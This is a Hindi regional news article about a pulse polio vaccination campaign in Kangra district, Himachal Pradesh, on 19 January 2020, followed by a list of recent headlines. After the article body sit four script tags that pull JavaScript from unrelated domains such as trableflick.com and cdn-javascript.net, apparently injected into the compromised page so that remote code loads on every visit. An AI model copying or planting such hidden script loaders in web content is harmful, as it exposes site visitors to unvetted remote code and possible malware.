Categories: हिमाचल

कांगड़ाः सघन पल्स पोलियो टीकाकरण अभियान 19 जनवरी कोः राकेश कुमार प्रजापति

<p>जिला कांगड़ा में सघन पल्स पोलियो टीकाकरण अभियान के तहत 19 जनवरी, 2020 को कांगड़ा जिला में 0 से 5 साल आयु वर्ग के 1, 24, 453 बच्चों को पोलियो की दवा पिलाने का लक्ष्य रखा गया है। यह जानकारी उपायुक्त राकेश कुमार प्रजापति ने जिला में पल्स पोलियो अभियान के प्रबंधन हेतू आयोजित जिला स्तरीय टॉस्क फोर्स बैठक की अध्यक्षता करते हुए दी। उपायुक्त ने कहा कि इस अभियान के तहत कांगड़ा जिला में पोलियो की खुराक पिलाने के लिए 1070 बूथ स्थापित किये जाएंगे। इसके साथ 22 ट्रॉजिट पॉइंट (बस स्टैंड, रेलवे स्टेशन, झुग्गी झोपड़ी, ईंट के भट्टे, भवन निर्माण स्थल) पोलिंग बूथ लगाए जाएंगे, जिनमें पोलियो की बूंदें पिलाई जाएंगी।</p>

<p>इसके लिए जिला भर में 4280 टीम के सदस्य नियुक्त किये गये हैं, 2013 सुपरवाईजरों की देख-रेख में यह सदस्य कार्य करेंगे। टीकाकरण के सभी सदस्य 19 जनवरी, 2020(रविवार)के दिन बूथ पर दवाई पिलाएंगे और 20 और 21 जनवरी, 2020 को घर-घर जाकर इस अभियान में छूटे बच्चों को पोलियों की दवाई पिलाई जाएगी। समस्त विभागाध्यक्षों को निर्देश देते हुए कहा कि इस अभियान को सफल बनाने के लिए स्वास्थ्य विभाग के साथ इस कार्य को करने में अपना सहयोग दें ताकि 0 से 5 साल का एक भी बच्चा पोलियो की खुराक से वंचित न रहे।<br />
&nbsp;<br />
उपायुक्त ने सभी अभिभावकों से अनुरोध किया है कि इस अभियान को सफल बनाने के लिए बच्चों को 19 जनवरी (रविवार) के दिन नजदीकी पोलियो बूथ में जा कर दो बूंद पोलियो की अवश्य पिलाएं। जिला के सभी लोगों से इस कार्यक्रम को सफल बनाने में सहयोग की अपील की है। उन्होंने स्वयं सेवी संस्थाओं के प्रतिनिधियों और सभी अभिभावकों से रचनात्मक सहयोग देने का आग्रह किया है। उपायुक्त ने छोटा भंगाल क्षेत्र में भी इस अभियान को सुचारू रूप से चलाने के लिए चिकित्सा विभाग के अधिकारियों को निर्देश दिये। सीएमओ डॉ.गुरदर्शन गुप्ता ने बताया कि भारतवर्ष को 28 मार्च, 2014 को पोलियो मुक्त देश का प्रमाण मिल चुका है, फिर भी झुग्गी झोंपड़ियों आदि में रहने वाले बच्चों पर विशेष ध्यान दिया जाएगा। ताकि दोबारा देश में कोई पोलियो का मामला न आए।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578046015251″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

सीएम सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी, आईजएमसी में हुआ उपचार

Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…

11 hours ago

पालमपुर कृषि विवि की 112 हेक्टेयर भूमि को पर्यटन विभाग के नाम पर हस्तांतरित करने पर हाईकोर्ट की रोक

  शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…

11 hours ago

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

13 hours ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

14 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

15 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

15 hours ago